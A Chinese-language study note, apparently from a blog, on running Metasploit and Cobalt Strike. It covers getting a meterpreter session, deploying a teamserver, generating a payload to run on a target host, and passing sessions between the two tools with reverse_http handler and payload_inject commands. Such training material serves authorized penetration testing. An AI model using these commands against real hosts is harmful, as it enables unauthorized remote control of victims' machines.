网络安全学习-10

95 阅读1分钟

一、使用msfvenom

  1. kali系统默认有该软件,升级软件即可
sudo apt-get update && apt-get install metasploit-framework

2. 初始换数据库:

msfdb init		
msfdb start 	
msfdb stop 	  

image.png

  1. 运行软件
msfconsole 

image.png

  1. 设置参数
use 0
set rhosts x.x.x.x   #目标主机的地址
run

image.png

image.png

  1. 出现meterpreter表示成功,现在就可以在目标主机上执行命令:

image.png

二、安装部署Cobalt Strike服务端并使用客户端连接,并截屏

1. 部署

将server上传到kali:

image.png

设置权限

cd CobaltStrike4.9.1_Server
chmod 777 *

image.png

启动服务端,Ok@123456是密码可以根据需要进行修改,不要使用弱口令

nohup ./teamserver X.X.X.X Ok@123456 > teamserver.log 2>&1 &

image.png

运行客户端:

image.png

image.png

进入主界面:

image.png

2. 使用

设置监听器;

image.png

image.png

image.png 生成payload:

image.png

image.png

image.png

点击生成,并选择保持位置:

image.png

将生成的payload,发送给目标主机,并运行后,CS就可以收到对话:

image.png

进入交互模式;

image.png

执行目标主机命令:

image.png

三、msf和Cobalt Strike间的会话传递

1. CS->MSF

配置CS:

image.png

image.png

image.png

配置msf:

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost x.x.x.x			#CS的IP地址
set lport 4444 	#和CS的端口一致
run

image.png

回到CS,右键会话-->凭证授权-->新建会话

image.png

image.png

此时,回到msf发现已经连接成功:

image.png

2. MSF->CS

配置CS监听器:

image.png

配置msf:

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set session 1
set lhost x.x.x.x   #这个地址写cs服务器的地址
set lport 8088				#和CS监听的端口一致
run

image.png

验证:

image.png